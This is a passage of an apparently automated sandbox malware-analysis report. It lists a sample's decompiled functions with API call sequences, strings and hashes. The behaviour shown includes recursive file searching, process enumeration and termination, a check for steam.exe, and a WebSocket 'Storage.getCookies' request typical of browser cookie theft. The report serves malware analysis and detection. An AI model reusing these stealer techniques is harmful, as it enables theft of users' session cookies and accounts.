                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,011CE2B0), ref: 002CDA36
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,?), ref: 002CDA4A
                                    • Part of subcall function 002CD980: lstrcat.KERNEL32(?,011CD580), ref: 002CDA5E
                                    • Part of subcall function 002CD980: lstrcpy.KERNEL32(00000000,?), ref: 002CDA8E
                                    • Part of subcall function 002CD980: GetFileAttributesA.KERNEL32(00000000), ref: 002CDA95
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CDE2E
                                  • FindClose.KERNEL32(00000000), ref: 002CDE3D
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CDE66
                                  • lstrcat.KERNEL32(?,011CDA30), ref: 002CDE7A
                                  • lstrlen.KERNEL32(?), ref: 002CDE84
                                  • lstrlen.KERNEL32(?), ref: 002CDE92
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CDED2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                  • String ID: %s\%s$%s\*
                                  • API String ID: 4184593125-2848263008
                                  • Opcode ID: c99ea131fcca1c2535b3d826bf4d1d695e04c3aafce505491fe8f53655f35fa2
                                  • Instruction ID: 57db7a0e6e50c3880a3381d830e5c3c99618c06822c85a766336d4775a30a4c2
                                  • Opcode Fuzzy Hash: c99ea131fcca1c2535b3d826bf4d1d695e04c3aafce505491fe8f53655f35fa2
                                  • Instruction Fuzzy Hash: 6B617271920249ABCF20EF74DC89AEE77B9BF48340F4045A8F54AA7291DB34AE54CF54
                                  Function 002CD530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • wsprintfA.USER32 ref: 002CD54D
                                  • FindFirstFileA.KERNEL32(?,?), ref: 002CD564
                                  • StrCmpCA.SHLWAPI(?,002E17A0), ref: 002CD584
                                  • StrCmpCA.SHLWAPI(?,002E17A4), ref: 002CD59E
                                  • lstrcat.KERNEL32(?,011CEA38), ref: 002CD5E3
                                  • lstrcat.KERNEL32(?,011CEA98), ref: 002CD5F7
                                  • lstrcat.KERNEL32(?,?), ref: 002CD60B
                                  • lstrcat.KERNEL32(?,?), ref: 002CD61C
                                  • lstrcat.KERNEL32(?,002E1794), ref: 002CD62E
                                  • lstrcat.KERNEL32(?,?), ref: 002CD642
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CD682
                                  • lstrcpy.KERNEL32(00000000,?), ref: 002CD6D2
                                  • FindNextFileA.KERNEL32(00000000,?), ref: 002CD737
                                  • FindClose.KERNEL32(00000000), ref: 002CD746
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                  • String ID: %s\%s
                                  • API String ID: 50252434-4073750446
                                  • Opcode ID: da6c544e3b0151da0418a82ae7e7cffd532e20d3aa39d7f37531461b2c28a386
                                  • Instruction ID: 6ed52d7209b4ff37627165249ddee3828ce88e2f71d354a5b49b55fa300fb8ab
                                  • Opcode Fuzzy Hash: da6c544e3b0151da0418a82ae7e7cffd532e20d3aa39d7f37531461b2c28a386
                                  • Instruction Fuzzy Hash: 496177719202599BCF20EF74DC84ADEB7B8EF48300F5085B9E649A7251DB34AE55CF90
                                  Function 002D48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                  • API String ID: 909987262-758292691
                                  • Opcode ID: ca9188437960cb1ba1949675e494de8064d3dc60dc1e5ebf8e1c28829123f554
                                  • Instruction ID: 58868d17d0a5a3e006917e696a6349c6a483d9e15289b534c625d12d443ce024
                                  • Opcode Fuzzy Hash: ca9188437960cb1ba1949675e494de8064d3dc60dc1e5ebf8e1c28829123f554
                                  • Instruction Fuzzy Hash: 4CA25871D212699FDF20DFA8C8907EDBBB6AF48300F1481AAE509A7341DB715E95CF90
                                  Function 002C23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C23D4
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C23F7
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C2402
                                  • lstrlen.KERNEL32(\*.*), ref: 002C240D
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C242A
                                  • lstrcat.KERNEL32(00000000,\*.*), ref: 002C2436
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C246A
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C2486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2567437900-1173974218
                                  • Opcode ID: c700668478e12f5b38917ead6b9bb6d9b5093bb5ef5e93589dea4150b6a97193
                                  • Instruction ID: eaac87f521d7bd0206dffdff7b5833bd71b140630724cc6dcd087e47d526e2c5
                                  • Opcode Fuzzy Hash: c700668478e12f5b38917ead6b9bb6d9b5093bb5ef5e93589dea4150b6a97193
                                  • Instruction Fuzzy Hash: 44413D31531756CBCB32EF24DD85BDE77A4AF54341F105168B88AAB252CF309C698F90
                                  Function 002D46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 002D46B9
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D46C9
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D46DB
                                  • StrCmpCA.SHLWAPI(?,?), ref: 002D46ED
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002D4702
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 002D4711
                                  • CloseHandle.KERNEL32(00000000), ref: 002D4718
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D4726
                                  • CloseHandle.KERNEL32(00000000), ref: 002D4731
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 3836391474-0
                                  • Opcode ID: 711fa4c96f3f05b5e8da466a4c880764b01ecdf23fed621a9b9a19343d537fb7
                                  • Instruction ID: 797c1e7d4a5fd3a374c972d1b3867677c109b679b9ec645af6169f221f4fecd1
                                  • Opcode Fuzzy Hash: 711fa4c96f3f05b5e8da466a4c880764b01ecdf23fed621a9b9a19343d537fb7
                                  • Instruction Fuzzy Hash: CA01A1315111556BEB20AB609CCCFFA777CAB49B11F0400A9F90999181EF749D508A68
                                  Function 00662542 Relevance: 13.0, Strings: 9, Instructions: 1712COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &`?n$O7Mo$]X5o$q%\$r?f$xcgv$zl'~$}uV$9P/
                                  • API String ID: 0-2738552638
                                  • Opcode ID: 7421d8336add41cdffc5511a7557a1c0939e2df05c8640f2a25e18c7b1b898d1
                                  • Instruction ID: 5abf5e741e099997c37b33adad982e994c7863931a4f91b18eed291c942e21a1
                                  • Opcode Fuzzy Hash: 7421d8336add41cdffc5511a7557a1c0939e2df05c8640f2a25e18c7b1b898d1
                                  • Instruction Fuzzy Hash: 8AB22DF3A082049FE304AE2DEC8567BBBD9EFD4720F1A853DE6C4C7744E97598058692
                                  Function 0066E13A Relevance: 12.9, Strings: 9, Instructions: 1616COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 7sz$@X>{$\f;$d8m$gPu/$qI]$xJYc$|j;$lw/
                                  • API String ID: 0-1601643683
                                  • Opcode ID: 489083fa78044b4d6f1c94db448143bfc7e1831062586664c7741d36be2ca454
                                  • Instruction ID: 9a0aaaf8b134e27e77ef53417d4b4233918392eb69cb608acb39aae1fa4846d5
                                  • Opcode Fuzzy Hash: 489083fa78044b4d6f1c94db448143bfc7e1831062586664c7741d36be2ca454
                                  • Instruction Fuzzy Hash: C6B2C3F260C2009FE304AE2DEC8567AB7E5EF94720F1A893DE6C5C7744EA3598418797
                                  Function 0067174A Relevance: 12.8, Strings: 9, Instructions: 1548COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &YZo$?^y$P?$gyz$gyz$yUlc$?NK$M|=$Zfs
                                  • API String ID: 0-2229435254
                                  • Opcode ID: 69aca2a78aedc0cfe60aa339bfb7760fbc8d998e59105679ce8b50530232ac53
                                  • Instruction ID: c5f98cc090eaacbd17dafde96d0b3ea2c3475aad51922a65ac092181d7f544f1
                                  • Opcode Fuzzy Hash: 69aca2a78aedc0cfe60aa339bfb7760fbc8d998e59105679ce8b50530232ac53
                                  • Instruction Fuzzy Hash: C6A206F36086009FE304AE2DDC8567AFBE5EFD4720F1A893DEAC497704E63598118697
                                  Function 002D4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 002D4628
                                  • Process32First.KERNEL32(00000000,00000128), ref: 002D4638
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D464A
                                  • StrCmpCA.SHLWAPI(?,steam.exe), ref: 002D4660
                                  • Process32Next.KERNEL32(00000000,00000128), ref: 002D4672
                                  • CloseHandle.KERNEL32(00000000), ref: 002D467D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000004E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779898298.00000000004FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.00000000004FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000783000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779912835.0000000000799000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780131296.000000000079A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780225025.000000000092E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1780236934.000000000092F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_2b0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                  • String ID: steam.exe
                                  • API String ID: 2284531361-2826358650
                                  • Opcode ID: 9345b2cdb7cfa364fd843df7a1a14840cc169134fed6661e4b88eb0827565e47
                                  • Instruction ID: d4215c65c4e6871e4a9970a816d70a1a68bd20f4a04320a7f8644896cc18fc80
                                  • Opcode Fuzzy Hash: 9345b2cdb7cfa364fd843df7a1a14840cc169134fed6661e4b88eb0827565e47
                                  • Instruction Fuzzy Hash: 36018F71611124ABDB20EF60AC88FEA77ACEB09350F4401E6F909D5181EB74CDA48AE9
                                  Function 002C4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,002DCFEC), ref: 002C4B51
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4B74
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 002C4B7F
                                  • lstrlen.KERNEL32(002E4CA8), ref: 002C4B8A
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BA7
                                  • lstrcat.KERNEL32(00000000,002E4CA8), ref: 002C4BB3
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 002C4BDE
                                  • FindFirstFileA.KERNEL32(00000000,?), ref: 002C4BFA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1779743360.00000000002B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                                  • Associated: 00000000.00000002.1779727181.00000000002B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.00000000002E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1779743360.0000000000346000.00000040.00000001.01000000.00000003.sdmpDownload File
